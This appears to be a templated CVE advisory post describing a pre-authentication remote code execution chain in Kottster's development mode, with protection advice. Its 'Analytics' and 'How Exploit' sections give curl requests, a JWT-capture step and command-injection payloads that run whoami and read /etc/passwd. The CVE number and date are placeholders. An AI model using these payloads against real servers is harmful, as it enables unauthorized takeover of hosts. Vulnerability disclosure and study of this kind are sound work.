Kottster, Pre-Authentication Remote Code Execution, CVE-2024-XXXXX (Critical)

Listen to this Post

How the CVE Works

The vulnerability exploits Kottster’s development mode, which lacks critical security checks. An attacker first repeatedly calls the unguarded `initApp` action. This creates a new root administrator account and returns a valid JWT token, bypassing authentication entirely. With this administrative token, the attacker then targets the `installPackagesForDataSource` action. This function constructs system commands using unsanitized user input from the request, allowing for command injection. By chaining these two flaws—reinitialization for auth bypass and command injection for execution—an unauthenticated attacker achieves full remote code execution on the development server, compromising the underlying host.

DailyCVE

Platform: Kottster
Version: <3.3.2
Vulnerability: Pre-auth RCE
Severity: Critical

date: 2024-XX-XX

Prediction: Patch Available

What Undercode Say:

Analytics

curl -X POST http://TARGET/initApp
curl -H "Authorization: Bearer JWT" -X POST http://TARGET/api/installPackagesForDataSource --data '{"packageManager":"npm; whoami "}'
// Malicious payload for command injection
{"packageManager": "npm; cat /etc/passwd "}

How Exploit:

1. Call `/initApp` repeatedly.

2. Capture new admin JWT.

3. Inject commands via `installPackagesForDataSource`.

Protection from this CVE

Upgrade to v3.3.2.

Isolate development instances.

Use production mode.

Impact:

Full system compromise.

Development mode only.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top